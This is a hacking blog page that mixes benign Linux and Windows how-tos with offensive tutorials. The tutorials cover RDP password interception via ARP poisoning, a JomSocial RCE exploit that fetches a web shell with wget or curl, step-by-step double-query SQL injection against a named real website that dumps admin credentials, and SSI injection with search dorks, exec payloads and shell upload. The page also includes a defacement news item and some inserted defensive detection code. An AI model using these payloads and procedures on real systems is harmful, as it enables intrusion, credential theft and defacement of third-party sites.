
Welcome back, my budding hackers!
One of the keys to becoming a professional and successful hacker is to think creatively. There is always a way to get into any network or system, if you think creatively. In previous tutorials, I have demonstrated ways to crack passwords on both Linux and Windows systems, but in this case, I will show you a way to get the sysadmin password by intercepting it from a Remote Desktop session.
As you know, RDP, better known as Remote Desktop Protocol, is a protocol that enables a sysadmin or tech support staff to take control of the end user's system to help or troubleshoot some issue or problem. When implemented correctly, interception of RDP traffic is difficult, but few companies implement it correctly. In fact, I have found that in MOST companies, RDP is vulnerable to the following attack, so pay close attention here as this attack is rather complex and requires your close attention and patience.
Note: We will be using Cain and Abel to conduct this MitM attack, so without a CACE Technologies proprietary wireless adapter, this attack will only work on a wired network.

Step 1: Enable RDP Server on One System

First, we need a system with RDP enabled. If you are using this in your lab, enable one Windows machine's RDP server. Go to Control Panel, then System and Security. Below the System section, you will see "Allow remote access". Click there.
Next, click on the "Allow Remote Assistance connections to this computer" and click "Apply."

Step 2: Install Cain on Windows System

You should have Cain and Abel installed on your attack system. I have it on my Windows 7 system that I will be using to attack RDP on another Windows 7 system. In this case, we will not be using BackTrack as Cain and Abel is one of the few hacking tools developed originally for Windows and has never been ported to Linux.
Cain and Abel, besides being a great password cracking tool (albeit a bit slow) is probably the best MiTM tool on the market—and it is free!

Step 3: Use ARP Scan on Systems with Cain

Now that we have Cain and Abel running on our attack system and RDP server enabled on another, we need to do an ARP scan. In this way, we will find all the systems on the network by sending out ARP requests and the systems on the network will respond with their IP address and MAC addresses. Choose a range that is appropriate for your target network.

Step 4: ARP Poison

Next, now that we know all the machines, IP addresses and MAC addresses on the network from the ARP scan, we are in a position to poison the ARP. We poison the ARP so that our attack system sits between the RDP server and the RDP client. In this way, all of either machine's traffic must travel through our attack machine.
Click on the Sniffer button on Cain, then select the Sniffer tab, then select the Hosts tab at the bottom, then click on the blue + on the top menu, select the Radio button, select the target IP range, and click OK.
Here, we see the hosts on the network.

Step 5: Choose the Server and Client You Want to Poison

Select the APR button at the bottom next to the hosts tab you used above, press the blue + button, select the targets, and press OK.

Step 6: Connect RDP Client to the RDP Server

Now, we wait for the RDP client to connect to the RDP server. This is likely to happen when an individual calls tech support and tech support needs to configure and demonstrate something on their machine. As you might guess, this requires some patience. When they do, we can then intercept its traffic.
Below, we are connecting to the RDP server called Null Byte.

Step 7: Intercept Traffic

With our Cain and Abel MiTM attack in place, all of the traffic between the RDP server and the RDP client will pass through our attack system.
Cain and Abel is now capturing the entire session and saving it into a file named in the far right column. We can now right click on that filename and choose View to open the decrypted file in Notepad.

Step 8: Search for Traffic

Now that all the traffic on the RDP connection is traveling through our attack system, we can search for traffic of interest to us.
Ideally, we want the sysadmin password for RDP. If we can find the sysadmin password for RDP, we will likely be able to use RDP on any of the network's machines as usually the sysadmin will set up RDP with the same password on every system for convenience.
Even better, many sysadmins use the same password to remote into client machines as they use on their system and other accounts. This means that when we capture this password we may own the entire domain and network!
To find any keys pressed in the hexadecimal file capture, use the Find feature in Notepad to search for "key pressed". This will find each of the keystrokes, one-by-one, of any keystrokes entered by the sysadmin including their password. This is tedious work, but you will be rewarded with a pot-of-gold for your patience!
Keep coming back my budding hackers as we continue to explore the wonderful world of hacking!

Hack Like a Pro: How to Hack Remote Desktop Protocol (RDP) to Snatch the Sysadmin Password

By admin → Monday, March 31, 2014
Hi friends, good evening. Tonight I will show a way to install a video editing application on Linux. In this tutorial I use PiTiVi Video Editor for video editing in Linux. First, download the PiTiVi Video Editor file; you can download it here Koetaradja48. Once you have downloaded the PiTiVi file, we can begin installing it. PiTiVi Video Editor is simple to install, in only 2 steps. Open a Terminal in Linux and run the commands:
apt-get update {enter}
apt-get install pitivi {enter}

Done, friends. Simple 99%
>>Source<< I got the method above from here, on my own ... Next Source

In this tutorial I work manually; if we work manually, we must look for the tool first.

Ok guys,

Locate the file that we downloaded earlier.
You can see my screenshot.

Once you have found it, run the command dpkg -i pitivi_0.15.2-0.1_all.deb {enter}


dpkg: error processing pitivi (--install):
 dependency problems - leaving unconfigured
Processing triggers for desktop-file-utils ...
Processing triggers for gnome-menus ...
Processing triggers for shared-mime-info ...
Processing triggers for hicolor-icon-theme ...
Processing triggers for man-db ...
Errors were encountered while processing:
 pitivi

If it fails with an error, I have a solution. Although dpkg -i pitivi_0.15.2-0.1_all.deb gave an error, PiTiVi Video Editor already appears in the menu at:
 Applications >> Sound & Video > PiTiVi Video.
You can check first: at this point, clicking it does not open the PiTiVi application.

Ok guys, now we fix the error. The next command is: apt-get install -f {enter}

When that is done, open PiTiVi from here:
Applications >> Sound & Video > PiTiVi Video {click}

Ok friends, that is how to install the PiTiVi video editor on Linux. Good luck.
Regards, Koetaradja48





how to install pitivi video editor in linux Kali

By admin →
Welcome to our blog :)
This time I will share a Radio Streaming application made by my friend Agam Bastard. This software lets you listen to the radio without having to open a browser, and it also includes the IDCA forum, so you can log in to the forum from there.

Radio view

Forum view

[Image: YvA4fS2.png]

Interested? Download it here.

Thanks To : Agam Bastard

Author : Bimo Septiawan

IDCA Radio Application for PC / Laptop

By admin →


It has been a long time since we covered defacing. This time the admin will share a deface trick, namely "JomSocial 2.6 - Remote Code Execution". See the tutorial below:

JomSoc is a Joomla component that lets you build an advanced social networking site; it is popular, free to use, and open source Joomla software.

The JomSocial component version 2.6 has an RCE (Remote Code Execution) bug that lets an attacker execute malicious code to exploit websites that use this component.

Materials to download before starting:

Exploit
Python 27

Steps:

♤ Install Python
♤ Open cmd
♤ Change to the directory where the exploit is located
♤ Run the exploit


Command:
1. exploit.py -u http://127.0.0.1/index.php -opsi

Options:
1. u -> target URL / website, format: http://situs.com/index.php
2. p -> execute PHP code: "echo 'Hello World!';"
3. s -> execute a shell command: "netstat -n", etc.
4. c -> choose the function to use: passthru

♤ How to plant a shell

trick a:
1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"

trick b:
1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"

That is the article we can offer. We took this article from user Sanjungan Jiwa on our forum; if you run into obstacles or problems while following this tutorial, go straight to the thread here.

Thank you,
Thanks to : Sanjungan Jiwa

Author : Bimo Septiawan

JomSocial 2.6 - Remote Code Execution

By admin →
Cloud Cracker is an online password cracking service for penetration testers and network auditors who need to check the security of WPA protected wireless networks, crack password hashes or break document encryption. 

Features :: 

  • Easy to use
  • Save money, save time
  • Support WPA/WPA2, NTLM, SHA-512, MD5, MS-CHAPv2 
  • Secure transmission
  • Fast password cracking service

Cloud Cracker (Online WPA/WPA2 and Hash Cracker)

By admin →
Hey guys, this morning I want to explain a little about how to install a theme on Kali Linux. I got this tutorial from my brother Deini and modified it a little in my own notes, so it is no longer the same as Deini's. Ok friends, without more talk, let's go straight to the point.

First, open a terminal in Linux with Ctrl + Alt + T.
Then run the command:
root@Koetaradja48 ~ # apt-get install gnome-tweak-tool (enter)

You can see my screenshot.

Ok friends, don't look at the girl in that picture; focus on the tutorial :D

Once gnome-tweak-tool is installed, we can open it. There are 2 ways. First, you can open it from the terminal with the command:
root@Koetaradja48 ~ # gnome-tweak-tool (enter)
You can see my screenshot.

Or you can open it the second way:
Click Applications > System Tools > Preferences > Advanced Settings
You can see my screenshot.

Ok, now we look for a theme first. Open Google Chrome or Mozilla Firefox and search for:


gnome look {enter }




Click GNOME-Look.org

Click GTK 3.x

Now find a theme that suits you;
when you have found one, download it.

When the download is finished, open the folder where the file was downloaded, then extract it with the tool that matches the file type, for example tar.gz
You can see my screenshot.

Then copy the theme files to /usr/share/themes/; you can also do the copy from the Kali Linux terminal.

Open gnome-tweak-tool
Click Themes > GTK+ Themes and select the name of the theme you extracted


yess




Ok friends, we are finished; comment below.
Ok friends, see you again in the next tutorial. Greetings, Koetaradja48

How to Install a themes in Kali linux

By admin → Sunday, March 30, 2014
Hi guys, KakekGalau here again. Rather than sleeping to no benefit, I'm just scribbling on this blog. Ok, without further small talk.

Ok, let's begin :D

Click the Start menu and type Run, or press Super+R

Type the command diskpart {enter}

When that is done, run the command list disk {enter}

Next, run the command select disk 1. A little explanation of why I select disk 1 at this step: disk 1 is the flash drive I am using, with a size of 7740 MB. If yours is bigger, you have to pick the bigger one :D Ok {enter}

Ok, we clean it first:
  command clean {enter}

Next, create partition primary {enter}

Then select partition 1 {enter}

then the command active {enter}

Next, run the command format fs=fat32

Ok, when the format reaches 100 percent, run the command assign {enter}

After assign, run the command exit {enter}

Ok, the manual boot preparation is done. Now copy the files that were extracted from the Windows ISO file on your laptop.

A little screenshot

Copy all the files to the flash drive we just made bootable. Reboot your computer when you want to install Windows :D
Good luck. Ok, that's all and thank you :D

How to Manually Boot Windows 7 onto a Flash Drive

By admin →


One of the reputed educational institutes of India, "Sikkim Manipal University", has been hacked and defaced by a hacker with the online handle "Venki" from Indian Cyber Pirates.

On the deface page the hacker left a message for the site admin stating that he had reported multiple vulnerabilities to the site admin but they had not responded. The hacker did not deface the index page of the site; rather, he uploaded his deface page to a directory of the site (http://smu.edu.in/resources/icp.htm).

When we contacted the hacker, he told us that he had reported the vulnerability to the admin, but they had not given him any response. He defaced the site just to show the security issue. He noted that,
"I didn't cause any damage to the site or server, just taking site admin attention to its reports. This was just security alert to the site admin"
The hacker told us that today he again reported the security issue, with the deface page link as a POC. In the meantime the site admin has patched the site and restored the defaced page. Hopefully they now realise that a small report can damage their system.

Additionally, the hacker told us that he had access to the server database and has all the student data, exam result details and other important data. You can check the screenshot below, provided by the hacker to us by mail.

Sikkim Manipal University Database

Sikkim Manipal University is a co-educational public-private funded university located in Gangtok, Sikkim, India. It was established in 1995 and is the first government-private initiative in the region.

I have seen many times that hackers have reported a security issue to an organisation, but it has not taken any action or responded to them. Sometimes a site admin patches the loopholes but does not respond to the security reports.

This is a big issue: if hackers report a security issue in its system, the organisation's representative must respond to the reports, even if it does not have a bounty program. Responding to the reports may help them fix the security loopholes in their system.

Sikkim Manipal University Site Hacked by Indian Hacker

By admin →
Hello friends, today we are going to look at double query based SQL injection


this post is by Divakar K



  • here is the url
             http://www.advance-acoustic.com/en/produits/index/detail/id/3/sec/1

  • now find the injection point
  • here is how i got the injection point


             http://www.advance-acoustic.com/en/produits/index/detail/id/3'/sec/1
  • now the next step is to check whether we can extract the database using a union based command or not... but I didn't get the details using union based injection

  • now we can learn about double query based sql injection

step 1: to find the current database name


COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



  • http://www.advance-acoustic.com/en/produits/index/detail/id/3+and%28select%201%20FROM%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28database%28%29%29%29%20FROM%20information_schema.tables%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29/sec/1


step 2: to find the user name use user(); for the version use version()







  • you can get the list of database name using this command
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)


In this command, look at "LIMIT N,1": you have to increment the N value from 0 up to the number of databases on that site.

ex: I used limit 0,1 --> limit 1,1

There are only two databases :-p I can't increment further.

This is how you get the list of databases.


step 3: now to find the list of table in the particular database


+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



<HEX_VLAUE_OF_DB_NAME>--->here our database name is advance

hex value is CHAR(97, 100, 118, 97, 110, 99, 101)


like the previous step you need to increment the N value to get the list of tables in that particular database


limit 1,1 gives admin table :-p

step 4: now the next step is to find column name for the admin table


+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> AND table_name=<HEX_VLAUE_OF_TABLE_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)




<HEX_VLAUE_OF_DB_NAME>----->CHAR(97, 100, 118, 97, 110, 99, 101)
<HEX_VLAUE_OF_TABLE_NAME>--->CHAR(97, 100, 109, 105, 110)




As in the previous step, you need to increment the N value to get the list of column names


limit 0,1-->username1





limit 1,1-->password1



step 5: last step is to dump the values :-p


+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
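
The detection side of the technique above, as an added example that is not part of the original post: the double-query payloads have a stable shape (`floor(rand(0)*2)` inside a `count(*) ... GROUP BY` over `information_schema`), so they stand out in web access logs once the request is URL-decoded. The log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Apache/Nginx "combined"-style request line: client IP, URL, status code.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Building blocks of the double-query payload shown above.
SIGNS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)"),
    "count_group_by": re.compile(r"count\s*\(\s*\*\s*\).*group\s+by"),
    "information_schema": re.compile(r"information_schema\s*\.\s*\w+"),
}

def normalize(url, max_rounds=3):
    """Undo repeated URL encoding, SQL inline comments and case tricks."""
    for _ in range(max_rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    url = re.sub(r"/\*.*?\*/", " ", url)  # /**/ used to split keywords
    return re.sub(r"\s+", " ", url).lower()

def classify(url):
    """Return (verdict, matched sign names) for one request URL."""
    text = normalize(url)
    hits = sorted(name for name, rx in SIGNS.items() if rx.search(text))
    if "rand_floor" in hits and len(hits) > 1:
        return "error_based_sqli", hits
    return ("suspicious" if hits else "clean"), hits

def scan(log_text):
    """Return (client_ip, status, verdict, hits) for every non-clean request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, url, status = m.groups()
        verdict, hits = classify(url)
        if verdict != "clean":
            findings.append((ip, int(status), verdict, hits))
    return findings

# Constructed access-log lines (documentation IP range, made-up paths).
SAMPLE_LOG = """
203.0.113.7 - - [31/Mar/2014:10:01:02 +0000] "GET /item.php?id=5 HTTP/1.1" 200 5120
203.0.113.7 - - [31/Mar/2014:10:01:09 +0000] "GET /reports?sort=count&view=tables HTTP/1.1" 200 2210
203.0.113.9 - - [31/Mar/2014:10:02:10 +0000] "GET /item.php?id=5+and(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 312
203.0.113.9 - - [31/Mar/2014:10:02:15 +0000] "GET /item.php?id=5%2520AND%2528SELECT%25201%2520FROM%2528SELECT%2520COUNT%2528*%2529,CONCAT%2528VERSION%2528%2529,FLOOR%2528RAND%25280%2529*2%2529%2529x%2520FROM%2520INFORMATION_SCHEMA.TABLES%2520GROUP%2520BY%2520x%2529a%2529 HTTP/1.1" 500 312
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The underlying fix is on the application side: bind `id` as a query parameter instead of concatenating it into SQL, and do not return database error text to the client, since this technique reads its data out of the error message.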

Strange Sql injection

By admin →
Hi,
H4CK3R $P1D3R was here
Today I will teach you SSI (server side include)

SSI (server side include) injection is a web application exploit: you can put your code remotely onto vulnerable websites.
Server-side Include allows you to upload files with multiple extensions, but with the .php extension you can't execute your shell; you have to rename shell.txt to shell.php
Let's begin ...

Dorks :


inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=




Try any dork or find sites manually.
To check the vulnerability of websites, enter these commands in username and password

<!--#echo var="DATE_LOCAL" -->


It will show the date


<!--#exec cmd="whoami"-->


It will display which user is running on the server


<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)


It will show all files in the directory


<!-- #exec cmd="dir" --> (Windows)


It will display all files in the directory


[Image: 0.png]





for example enter


<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>


in username and password to view all files of website


now we have to upload our deface page or shell
to upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in username and password

<!--#exec cmd="wget http://website.com/deface.html" -->


to view your deface page goto site.com/deface.html

to upload a shell on website you have to host your shell anywhere in .txt format
then enter this command in login


<!--#exec cmd="wget http://website.com/abc.txt" -->


to check your txt file is uploaded or not list all files using


<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>


now you have to change the .txt extension to .php
to rename your txt file to php use this command

<!--#exec cmd="mv abc.txt abc.php" -->


now go to site.com/abc.php and access your shell.
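
The defensive counterpart, as an added example that is not part of the original post: SSI injection only works when form input is written unescaped into a page the server parses for directives. The sketch flags directive syntax in submitted fields and HTML-encodes every value before it is stored or echoed; the function names and form values are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# mod_include element names. Whitespace after "<!--" is tolerated so the
# "<!-- #exec" spelling shown above is flagged as well.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(config|echo|exec|fsize|flastmod|include|printenv|set"
    r"|if|elif|else|endif)\b",
    re.IGNORECASE,
)

def find_ssi(value):
    """Return the SSI element names found in a value (raw or URL-encoded)."""
    decoded = unquote(value)
    return [m.group(1).lower() for m in SSI_DIRECTIVE.finditer(decoded)]

def neutralize(value):
    """HTML-encode so '<', '>' and quotes can no longer form a directive."""
    return html.escape(value, quote=True)

def handle_form(fields):
    """Return (safe_fields, alerts): encoded values plus one alert per tainted field."""
    safe, alerts = {}, []
    for name, value in fields.items():
        elements = find_ssi(value)
        if elements:
            alerts.append({
                "field": name,
                "elements": elements,
                "runs_commands": "exec" in elements,
            })
        # Encode every value, flagged or not, before it reaches a template.
        safe[name] = neutralize(value)
    return safe, alerts

# Constructed login submission using the probes quoted in the post.
SAMPLE_FORM = {
    "username": '<!--#echo var="DATE_LOCAL" -->',
    "password": '<!-- #exec cmd="dir" -->',
    "remember": "on",
}

if __name__ == "__main__":
    safe, alerts = handle_form(SAMPLE_FORM)
    for alert in alerts:
        print(alert)
    print(safe)
```

On Apache, `Options IncludesNOEXEC` keeps SSI available while disabling `#exec`, and pages that render user input do not need `Includes` enabled at all.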

ssi server side include injection shell

By admin →